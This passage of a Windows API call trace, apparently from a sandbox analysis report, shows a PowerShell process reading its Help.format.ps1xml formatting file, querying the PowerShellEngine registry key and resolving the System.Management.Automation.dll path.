pguid=0x2de728*(Data1=0x88362feb, Data2=0x5b4b, Data3=0x4596, Data4=([0]=0x84, [1]=0x68, [2]=0xa3, [3]=0xe3, [4]=0x35, [5]=0xf3, [6]=0xc2, [7]=0xd7))) returned 0x0 [0145.237] VirtualQuery (in: lpAddress=0x2dd460, lpBuffer=0x2de460, dwLength=0x1c | out: lpBuffer=0x2de460*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.237] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x33f93b8, Data2=0x9f33, Data3=0x45db, Data4=([0]=0x8d, [1]=0x24, [2]=0x8e, [3]=0x94, [4]=0xd6, [5]=0xa4, [6]=0x1b, [7]=0x7f))) returned 0x0 [0145.237] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x2cb4a30d, Data2=0x3191, Data3=0x42d4, Data4=([0]=0x99, [1]=0x4c, [2]=0x6e, [3]=0xa5, [4]=0x48, [5]=0x2d, [6]=0x3e, [7]=0x75))) returned 0x0 [0145.237] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x9729f12a, Data2=0x17c7, Data3=0x48dd, Data4=([0]=0x8b, [1]=0x25, [2]=0x82, [3]=0xbc, [4]=0xab, [5]=0xc1, [6]=0x3f, [7]=0x6f))) returned 0x0 [0145.237] VirtualQuery (in: lpAddress=0x2dd460, lpBuffer=0x2de460, dwLength=0x1c | out: lpBuffer=0x2de460*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.237] VirtualQuery (in: lpAddress=0x2dd460, lpBuffer=0x2de460, dwLength=0x1c | out: lpBuffer=0x2de460*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0145.238] GetLastError () returned 0x0 [0145.238] SetErrorMode (uMode=0x1) returned 0x1 [0145.238] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c [0145.238] GetLastError () returned 0x0 [0145.238] GetFileType (hFile=0x34c) returned 0x1 [0145.238] SetErrorMode (uMode=0x1) returned 0x1 [0145.238] GetFileType (hFile=0x34c) returned 0x1 [0145.238] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.238] GetLastError () returned 0x0 [0145.238] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.238] GetLastError () returned 0x0 [0145.238] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.238] GetLastError () returned 0x0 [0145.239] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.239] GetLastError () returned 0x0 [0145.239] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.239] GetLastError () returned 0x0 [0145.239] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.239] GetLastError () returned 0x0 [0145.239] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.239] GetLastError () returned 0x0 [0145.239] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.239] GetLastError () returned 0x0 [0145.240] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.240] GetLastError () returned 0x0 [0145.240] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.240] GetLastError () returned 0x0 [0145.240] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.240] GetLastError () returned 0x0 [0145.241] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.241] GetLastError () returned 0x0 [0145.241] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.241] GetLastError () returned 0x0 [0145.241] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.241] GetLastError () returned 0x0 [0145.241] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.241] GetLastError () returned 0x0 [0145.241] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.241] GetLastError () returned 0x0 [0145.243] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.243] GetLastError () returned 0x0 [0145.243] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.243] GetLastError () returned 0x0 [0145.244] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.244] GetLastError () returned 0x0 [0145.244] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.244] GetLastError () returned 0x0 [0145.244] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.244] GetLastError () returned 0x0 [0145.244] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.244] GetLastError () returned 0x0 [0145.244] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.244] GetLastError () returned 0x0 [0145.244] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.244] GetLastError () returned 0x0 [0145.244] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.244] GetLastError () returned 0x0 [0145.244] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.245] GetLastError () returned 0x0 [0145.245] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.245] GetLastError () returned 0x0 [0145.245] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.245] GetLastError () returned 0x0 [0145.245] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.245] GetLastError () returned 0x0 [0145.245] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.245] GetLastError () returned 0x0 [0145.245] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.246] GetLastError () returned 0x0 [0145.246] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.246] GetLastError () returned 0x0 [0145.249] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.249] GetLastError () returned 0x0 [0145.249] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.249] GetLastError () returned 0x0 [0145.250] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.250] GetLastError () returned 0x0 [0145.250] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.250] GetLastError () returned 0x0 [0145.250] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.250] GetLastError () returned 0x0 [0145.250] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.250] GetLastError () returned 0x0 [0145.250] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.250] GetLastError () returned 0x0 [0145.250] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.250] GetLastError () returned 0x0 [0145.251] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.251] GetLastError () returned 0x0 [0145.251] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.251] GetLastError () returned 0x0 [0145.251] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.251] GetLastError () returned 0x0 [0145.251] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.251] GetLastError () returned 0x0 [0145.251] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.251] GetLastError () returned 0x0 [0145.251] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.252] GetLastError () returned 0x0 [0145.252] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.252] GetLastError () returned 0x0 [0145.252] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.252] GetLastError () returned 0x0 [0145.252] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.252] GetLastError () returned 0x0 [0145.252] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.252] GetLastError () returned 0x0 [0145.252] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.252] GetLastError () returned 0x0 [0145.253] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.253] GetLastError () returned 0x0 [0145.253] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.253] GetLastError () returned 0x0 [0145.253] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.253] GetLastError () returned 0x0 [0145.253] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.253] GetLastError () returned 0x0 [0145.253] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.253] GetLastError () returned 0x0 [0145.253] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.253] GetLastError () returned 0x0 [0145.254] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.254] GetLastError () returned 0x0 [0145.254] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.254] GetLastError () returned 0x0 [0145.254] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.254] GetLastError () returned 0x0 [0145.254] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.254] GetLastError () returned 0x0 [0145.254] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.254] GetLastError () returned 0x0 [0145.254] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0xf37, lpOverlapped=0x0) returned 1 [0145.255] GetLastError () returned 0x0 [0145.255] ReadFile (in: hFile=0x34c, lpBuffer=0x3042587, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042587*, lpNumberOfBytesRead=0x2de734*=0x0, lpOverlapped=0x0) returned 1 [0145.255] GetLastError () returned 0x0 [0145.255] ReadFile (in: hFile=0x34c, lpBuffer=0x3042eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042eb0*, lpNumberOfBytesRead=0x2de734*=0x0, lpOverlapped=0x0) returned 1 [0145.255] GetLastError () returned 0x0 [0145.255] CloseHandle (hObject=0x34c) returned 1 [0145.255] GetLastError () returned 0x0 [0145.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0145.255] GetLastError () returned 0x0 [0145.255] SetErrorMode (uMode=0x1) returned 0x1 [0145.255] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x3063eac | out: lpFileInformation=0x3063eac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0145.255] GetLastError () returned 0x0 [0145.255] SetErrorMode (uMode=0x1) returned 0x1 [0145.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0145.255] GetLastError () returned 0x0 [0145.256] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de6b8 | out: phkResult=0x2de6b8*=0x34c) returned 0x0 [0145.256] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x0, lpcbData=0x2de6fc*=0x0 | out: lpType=0x2de700*=0x1, lpData=0x0, lpcbData=0x2de6fc*=0x56) returned 0x0 [0145.256] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x3da558, lpcbData=0x2de6fc*=0x56 | out: lpType=0x2de700*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2de6fc*=0x56) returned 0x0 [0145.256] RegCloseKey (hKey=0x34c) returned 0x0 [0145.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0145.256] GetLastError () returned 0x0 [0145.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de1f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0145.256] GetLastError () returned 0x0 [0145.265] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x70dce904, Data2=0xadb6, Data3=0x4e22, Data4=([0]=0xa9, [1]=0x22, [2]=0x75, [3]=0xde, [4]=0x17, [5]=0xb2, [6]=0x25, [7]=0x6d))) returned 0x0 [0145.265] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xcf38d322, Data2=0xb914, Data3=0x4dc9, Data4=([0]=0xbf, [1]=0x96, [2]=0x3d, [3]=0x8c, [4]=0x94, [5]=0xc4, [6]=0xbd, [7]=0x8e))) returned 0x0 [0145.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.265] GetLastError () returned 0x0 [0145.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.265] GetLastError () returned 0x0 [0145.265] GetFullPathNameW (in: 